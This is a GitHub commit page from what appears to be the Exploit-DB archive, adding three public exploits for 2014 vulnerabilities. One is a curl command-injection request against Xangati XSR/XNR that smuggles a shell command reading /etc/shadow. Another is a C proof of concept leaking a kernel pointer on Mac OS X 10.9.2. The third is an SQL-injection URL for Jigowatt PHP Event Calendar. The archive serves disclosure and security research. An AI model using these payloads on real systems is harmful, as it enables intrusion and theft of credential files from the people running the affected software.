Skip to content

Commit cf02257

Browse files
author
Offensive Security
committed
DB: 2016-01-02
3 new exploits
1 parent f89cce1 commit cf02257

4 files changed

Lines changed: 58 additions & 0 deletions

File tree

files.csv

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -35392,3 +35392,6 @@ id,file,description,date,author,platform,type,port
3539235392
39141,platforms/php/webapps/39141.txt,"eazyCMS 'index.php' SQL Injection Vulnerability",2014-04-09,Renzi,php,webapps,0
3539335393
39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
3539435394
39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
35395+
39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0
35396+
39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0
35397+
39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0

platforms/cgi/webapps/39145.txt

Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
source: http://www.securityfocus.com/bid/66819/info
2+
3+
Xangati XSR And XNR are prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
4+
5+
An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
6+
7+
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
8+
9+
curl -i -s -k -X 'POST' \
10+
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
11+
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
12+
'hxxps://www.example.com/servlet/Installer'

platforms/osx/local/39147.c

Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
source: http://www.securityfocus.com/bid/67023/info
2+
3+
Apple Mac OS X is prone to a local security-bypass vulnerability.
4+
5+
Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
6+
7+
Apple Mac OS X 10.9.2 is vulnerable; other versions may also be affected.
8+
9+
#include <stdio.h>
10+
#include <strings.h>
11+
#include <sys/shm.h>
12+
13+
int main(int argc, char *argv[])
14+
{
15+
int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W );
16+
17+
if (shm < 0)
18+
{
19+
printf("shmget: failed");
20+
return 6;
21+
}
22+
23+
struct shmid_ds lolz;
24+
25+
int res = shmctl( shm, IPC_STAT, &lolz );
26+
if (res < 0)
27+
{
28+
printf("shmctl: failed");
29+
return 1;
30+
}
31+
32+
printf( "%p\n", lolz.shm_internal );
33+
34+
}

platforms/php/webapps/39146.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/66923/info
2+
3+
Jigowatt PHP Event Calendar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
Jigowatt PHP Event Calendar 2.16b is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/code/calendar/day_view.php?day=23&month=4&year=[SQL injection]

0 commit comments

Comments
 (0)